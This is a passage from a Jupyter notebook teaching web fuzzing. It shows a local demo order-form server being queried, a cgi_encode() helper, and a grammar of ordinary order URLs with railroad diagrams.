    "        display(HTML('<pre><a href=\"%s\">%s</a></pre>' % (url, url)))\n",
    "    else:\n",
    "        print(terminal_escape(url))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 59,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.542650Z",
     "iopub.status.busy": "2025-01-16T10:12:25.542551Z",
     "iopub.status.idle": "2025-01-16T10:12:25.544668Z",
     "shell.execute_reply": "2025-01-16T10:12:25.544458Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre><a href=\"http://127.0.0.1:8800\">http://127.0.0.1:8800</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "print_url(httpd_url)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Even more convenient, you may be able to interact directly with the server using the window below. \n",
    "\n",
    "**Note**: This only works if you are running the Jupyter notebook server on the local host."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 60,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.546182Z",
     "iopub.status.busy": "2025-01-16T10:12:25.546086Z",
     "iopub.status.idle": "2025-01-16T10:12:25.547602Z",
     "shell.execute_reply": "2025-01-16T10:12:25.547411Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from IPython.display import IFrame"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 61,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.549005Z",
     "iopub.status.busy": "2025-01-16T10:12:25.548924Z",
     "iopub.status.idle": "2025-01-16T10:12:25.551021Z",
     "shell.execute_reply": "2025-01-16T10:12:25.550819Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "        <iframe\n",
       "            width=\"100%\"\n",
       "            height=\"230\"\n",
       "            src=\"http://127.0.0.1:8800\"\n",
       "            frameborder=\"0\"\n",
       "            allowfullscreen\n",
       "            \n",
       "        ></iframe>\n",
       "        "
      ],
      "text/plain": [
       "<IPython.lib.display.IFrame at 0x11a4e3c50>"
      ]
     },
     "execution_count": 61,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "IFrame(httpd_url, '100%', 230)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "After interaction, you can retrieve the messages produced by the server:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 62,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.552404Z",
     "iopub.status.busy": "2025-01-16T10:12:25.552330Z",
     "iopub.status.idle": "2025-01-16T10:12:25.554116Z",
     "shell.execute_reply": "2025-01-16T10:12:25.553892Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "print_httpd_messages()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can also see any orders placed in the `orders` database (`db`):"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 63,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.555474Z",
     "iopub.status.busy": "2025-01-16T10:12:25.555399Z",
     "iopub.status.idle": "2025-01-16T10:12:25.557077Z",
     "shell.execute_reply": "2025-01-16T10:12:25.556865Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "And we can clear the order database:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 64,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.558417Z",
     "iopub.status.busy": "2025-01-16T10:12:25.558335Z",
     "iopub.status.idle": "2025-01-16T10:12:25.560475Z",
     "shell.execute_reply": "2025-01-16T10:12:25.560252Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "db.execute(\"DELETE FROM orders\")\n",
    "db.commit()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Retrieving the Home Page\n",
    "\n",
    "Even if our browser cannot directly interact with the server, the _notebook_ can.  We can, for instance, retrieve the contents of the home page and display them:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 65,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.561958Z",
     "iopub.status.busy": "2025-01-16T10:12:25.561867Z",
     "iopub.status.idle": "2025-01-16T10:12:25.572573Z",
     "shell.execute_reply": "2025-01-16T10:12:25.572308Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:25] \"GET / HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "contents = webbrowser(httpd_url)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 66,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.574190Z",
     "iopub.status.busy": "2025-01-16T10:12:25.574076Z",
     "iopub.status.idle": "2025-01-16T10:12:25.576451Z",
     "shell.execute_reply": "2025-01-16T10:12:25.576138Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n",
       "  <p>\n",
       "  Yes! Please send me at your earliest convenience\n",
       "  <select name=\"item\">\n",
       "  <option value=\"tshirt\">One FuzzingBook T-Shirt</option>\n",
       "<option value=\"drill\">One FuzzingBook Rotary Hammer</option>\n",
       "<option value=\"lockset\">One FuzzingBook Lock Set</option>\n",
       "\n",
       "  </select>\n",
       "  <br>\n",
       "  <table>\n",
       "  <tr><td>\n",
       "  <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n",
       "  </td><td>\n",
       "  <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n",
       "  </td></tr>\n",
       "  <tr><td>\n",
       "  <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n",
       "  </td><td>\n",
       "  <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n",
       "  </tr></tr>\n",
       "  </table>\n",
       "  <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n",
       "  the <a href=\"/terms\">terms and conditions</a></label>.<br>\n",
       "  <input type=\"submit\" name=\"submit\" value=\"Place order\">\n",
       "</p>\n",
       "</form>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 66,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Placing Orders\n",
    "\n",
    "To test this form, we can generate URLs with orders and have the server process them."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 67,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.578083Z",
     "iopub.status.busy": "2025-01-16T10:12:25.577967Z",
     "iopub.status.idle": "2025-01-16T10:12:25.579597Z",
     "shell.execute_reply": "2025-01-16T10:12:25.579361Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from urllib.parse import urljoin, urlsplit"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 68,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.581060Z",
     "iopub.status.busy": "2025-01-16T10:12:25.580971Z",
     "iopub.status.idle": "2025-01-16T10:12:25.583219Z",
     "shell.execute_reply": "2025-01-16T10:12:25.582982Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'http://127.0.0.1:8800/order?foo=bar'"
      ]
     },
     "execution_count": 68,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "urljoin(httpd_url, \"/order?foo=bar\")"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form.  Sending this URL to the browser effectively places the order, as we can see in the server log produced:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 69,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.584731Z",
     "iopub.status.busy": "2025-01-16T10:12:25.584622Z",
     "iopub.status.idle": "2025-01-16T10:12:25.592454Z",
     "shell.execute_reply": "2025-01-16T10:12:25.592220Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:25] INSERT INTO orders VALUES ('tshirt', 'Jane Doe', 'doe@example.com', 'Seattle', '98104')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:25] \"GET /order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "contents = webbrowser(urljoin(httpd_url,\n",
    "                              \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "The web page returned confirms the order:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 70,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.593930Z",
     "iopub.status.busy": "2025-01-16T10:12:25.593827Z",
     "iopub.status.idle": "2025-01-16T10:12:25.595854Z",
     "shell.execute_reply": "2025-01-16T10:12:25.595622Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook T-Shirt</strong> to Jane Doe in Seattle, 98104<br>\n",
       "  A confirmation mail will be sent to doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 70,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "And the order is in the database, too:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 71,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.597196Z",
     "iopub.status.busy": "2025-01-16T10:12:25.597093Z",
     "iopub.status.idle": "2025-01-16T10:12:25.598794Z",
     "shell.execute_reply": "2025-01-16T10:12:25.598586Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('tshirt', 'Jane Doe', 'doe@example.com', 'Seattle', '98104')]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Error Messages\n",
    "\n",
    "We can also test whether the server correctly responds to invalid requests.  Nonexistent pages, for instance, are correctly handled:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 72,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.600108Z",
     "iopub.status.busy": "2025-01-16T10:12:25.600008Z",
     "iopub.status.idle": "2025-01-16T10:12:25.604165Z",
     "shell.execute_reply": "2025-01-16T10:12:25.603947Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:25] \"GET /some/other/path HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Sorry.</strong>\n",
       "  <p>\n",
       "  This page does not exist.  Try our <a href=\"/\">order form</a> instead.\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 72,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(webbrowser(urljoin(httpd_url, \"/some/other/path\")))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "You may remember we also have a page for internal server errors.  Can we get the server to produce this page?  To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Fuzzing Input Forms\n",
    "\n",
    "After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    },
    "tags": []
   },
   "source": [
    "### Fuzzing with Expected Values\n",
    "\n",
    "Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs.  It comes with a few sample values for names, email addresses, cities and (random) digits."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Excursion: Implementing cgi_decode()"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and automatically encoding it into CGI:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 73,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.605654Z",
     "iopub.status.busy": "2025-01-16T10:12:25.605575Z",
     "iopub.status.idle": "2025-01-16T10:12:25.607065Z",
     "shell.execute_reply": "2025-01-16T10:12:25.606842Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import string"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 74,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.608425Z",
     "iopub.status.busy": "2025-01-16T10:12:25.608355Z",
     "iopub.status.idle": "2025-01-16T10:12:25.610341Z",
     "shell.execute_reply": "2025-01-16T10:12:25.610106Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def cgi_encode(s: str, do_not_encode: str = \"\") -> str:\n",
    "    ret = \"\"\n",
    "    for c in s:\n",
    "        if (c in string.ascii_letters or c in string.digits\n",
    "                or c in \"$-_.+!*'(),\" or c in do_not_encode):\n",
    "            ret += c\n",
    "        elif c == ' ':\n",
    "            ret += '+'\n",
    "        else:\n",
    "            ret += \"%%%02x\" % ord(c)\n",
    "    return ret"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 75,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.611663Z",
     "iopub.status.busy": "2025-01-16T10:12:25.611579Z",
     "iopub.status.idle": "2025-01-16T10:12:25.613539Z",
     "shell.execute_reply": "2025-01-16T10:12:25.613300Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'Is+%22DOW30%22+down+.24%25%3f'"
      ]
     },
     "execution_count": 75,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "s = cgi_encode('Is \"DOW30\" down .24%?')\n",
    "s"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "The optional parameter `do_not_encode` allows us to skip certain characters from encoding.  This is useful when encoding grammar rules:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 76,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.614946Z",
     "iopub.status.busy": "2025-01-16T10:12:25.614865Z",
     "iopub.status.idle": "2025-01-16T10:12:25.616776Z",
     "shell.execute_reply": "2025-01-16T10:12:25.616557Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'<string>%40<string>'"
      ]
     },
     "execution_count": 76,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "cgi_encode(\"<string>@<string>\", \"<>\")"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "`cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb):"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 77,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.618142Z",
     "iopub.status.busy": "2025-01-16T10:12:25.618063Z",
     "iopub.status.idle": "2025-01-16T10:12:25.983254Z",
     "shell.execute_reply": "2025-01-16T10:12:25.982966Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Coverage import cgi_decode  # minor dependency"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 78,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.985119Z",
     "iopub.status.busy": "2025-01-16T10:12:25.984998Z",
     "iopub.status.idle": "2025-01-16T10:12:25.986992Z",
     "shell.execute_reply": "2025-01-16T10:12:25.986773Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'Is \"DOW30\" down .24%?'"
      ]
     },
     "execution_count": 78,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "cgi_decode(s)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### End of Excursion"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "In the grammar, we make use of `cgi_encode()` to encode strings:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 79,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.988652Z",
     "iopub.status.busy": "2025-01-16T10:12:25.988555Z",
     "iopub.status.idle": "2025-01-16T10:12:26.048220Z",
     "shell.execute_reply": "2025-01-16T10:12:26.047966Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Grammars import crange, is_valid_grammar, syntax_diagram, Grammar"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 80,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.049960Z",
     "iopub.status.busy": "2025-01-16T10:12:26.049867Z",
     "iopub.status.idle": "2025-01-16T10:12:26.051869Z",
     "shell.execute_reply": "2025-01-16T10:12:26.051645Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "ORDER_GRAMMAR: Grammar = {\n",
    "    \"<start>\": [\"<order>\"],\n",
    "    \"<order>\": [\"/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>\"],\n",
    "    \"<item>\": [\"tshirt\", \"drill\", \"lockset\"],\n",
    "    \"<name>\": [cgi_encode(\"Jane Doe\"), cgi_encode(\"John Smith\")],\n",
    "    \"<email>\": [cgi_encode(\"j.doe@example.com\"), cgi_encode(\"j_smith@example.com\")],\n",
    "    \"<city>\": [\"Seattle\", cgi_encode(\"New York\")],\n",
    "    \"<zip>\": [\"<digit>\" * 5],\n",
    "    \"<digit>\": crange('0', '9')\n",
    "}"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 81,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.053369Z",
     "iopub.status.busy": "2025-01-16T10:12:26.053288Z",
     "iopub.status.idle": "2025-01-16T10:12:26.054927Z",
     "shell.execute_reply": "2025-01-16T10:12:26.054716Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "assert is_valid_grammar(ORDER_GRAMMAR)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 82,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.056256Z",
     "iopub.status.busy": "2025-01-16T10:12:26.056178Z",
     "iopub.status.idle": "2025-01-16T10:12:26.067507Z",
     "shell.execute_reply": "2025-01-16T10:12:26.067218Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "start\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"62\" viewBox=\"0 0 182.5 62\" width=\"182.5\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 21v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 31h0.0\"/><path d=\"M142.5 31h0.0\"/><path d=\"M40.0 31h20\"/><g>\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M122.5 31h0.0\"/><g class=\"non-terminal\">\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M122.5 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"60.0\" y=\"20\"/><text x=\"91.25\" y=\"35\">order</text></g></g><path d=\"M122.5 31h20\"/></g><path d=\"M 142.5 31 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "order\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"62\" viewBox=\"0 0 976.0 62\" width=\"976.0\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 21v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 31h0.0\"/><path d=\"M936.0 31h0.0\"/><path d=\"M40.0 31h20\"/><g>\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M916.0 31h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M182.0 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"122.0\" x=\"60.0\" y=\"20\"/><text x=\"121.0\" y=\"35\">/order?item=</text></g><path d=\"M182.0 31h10\"/><path d=\"M192.0 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M202.0 31h0.0\"/><path d=\"M256.0 31h0.0\"/><rect height=\"22\" width=\"54.0\" x=\"202.0\" y=\"20\"/><text x=\"229.0\" y=\"35\">item</text></g><path d=\"M256.0 31h10\"/><path d=\"M266.0 31h10\"/><g class=\"terminal\">\n",
       "<path d=\"M276.0 31h0.0\"/><path d=\"M347.0 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"71.0\" x=\"276.0\" y=\"20\"/><text x=\"311.5\" y=\"35\">&amp;name=</text></g><path d=\"M347.0 31h10\"/><path d=\"M357.0 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M367.0 31h0.0\"/><path d=\"M421.0 31h0.0\"/><rect height=\"22\" width=\"54.0\" x=\"367.0\" y=\"20\"/><text x=\"394.0\" y=\"35\">name</text></g><path d=\"M421.0 31h10\"/><path d=\"M431.0 31h10\"/><g class=\"terminal\">\n",
       "<path d=\"M441.0 31h0.0\"/><path d=\"M520.5 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"79.5\" x=\"441.0\" y=\"20\"/><text x=\"480.75\" y=\"35\">&amp;email=</text></g><path d=\"M520.5 31h10\"/><path d=\"M530.5 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M540.5 31h0.0\"/><path d=\"M603.0 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"540.5\" y=\"20\"/><text x=\"571.75\" y=\"35\">email</text></g><path d=\"M603.0 31h10\"/><path d=\"M613.0 31h10\"/><g class=\"terminal\">\n",
       "<path d=\"M623.0 31h0.0\"/><path d=\"M694.0 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"71.0\" x=\"623.0\" y=\"20\"/><text x=\"658.5\" y=\"35\">&amp;city=</text></g><path d=\"M694.0 31h10\"/><path d=\"M704.0 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M714.0 31h0.0\"/><path d=\"M768.0 31h0.0\"/><rect height=\"22\" width=\"54.0\" x=\"714.0\" y=\"20\"/><text x=\"741.0\" y=\"35\">city</text></g><path d=\"M768.0 31h10\"/><path d=\"M778.0 31h10\"/><g class=\"terminal\">\n",
       "<path d=\"M788.0 31h0.0\"/><path d=\"M850.5 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"62.5\" x=\"788.0\" y=\"20\"/><text x=\"819.25\" y=\"35\">&amp;zip=</text></g><path d=\"M850.5 31h10\"/><path d=\"M860.5 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M870.5 31h0.0\"/><path d=\"M916.0 31h0.0\"/><rect height=\"22\" width=\"45.5\" x=\"870.5\" y=\"20\"/><text x=\"893.25\" y=\"35\">zip</text></g></g><path d=\"M916.0 31h20\"/></g><path d=\"M 936.0 31 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "item\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
